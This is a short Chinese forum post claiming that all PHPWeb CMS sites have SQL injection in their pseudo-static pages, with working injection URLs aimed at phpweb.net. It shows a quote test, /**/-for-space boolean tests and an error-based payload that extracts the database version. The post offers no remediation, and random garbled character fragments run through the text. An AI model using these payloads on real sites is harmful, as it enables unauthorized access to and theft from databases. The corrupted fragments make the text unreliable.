phpweb所有的整站程序伪静态页面都存在sql注入
; z" \3 \$ `0 W9 F; X K: M
7 U4 p( M( b$ W$ m0 R: M6 f主站:http://phpweb.net/
b2 d+ x |* S1 E加’检测:# T1 h# y( W* ^ K: W3 a$ |' I
, B) v, U. o" e7 Z/ L
http://www.phpweb.net/down/html/?772′.html3 O P( E! u0 c, Z
3 a$ E7 E' |' n: N3 v6 \
出错" t6 b8 v4 R0 x% A" `" @2 x
存在注入。
& G5 F% j* D7 V( N5 z1 S) ^不能用空格,只能用/*罗1 p2 I) N5 s0 n+ T
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常6 U* L: c" f% L+ Z& q& M4 z! ~
- |; M) [' w7 ^) G/ P
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.- Y' T8 L; V7 c0 E! S. G$ U
爆数据库版本:! E+ {6 c% l8 n2 q: _
: w* @! H! l, c& G# J
?" z, i+ J& h/ ~: i. G0 v
1, U7 L9 {, z8 V
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
" r( U o/ g) A; J更新日期: 2013-01-03 13:39:50
4 n7 Q; b- M( c |
发表于 2013-1-4 19:46:42
收藏
支持
反对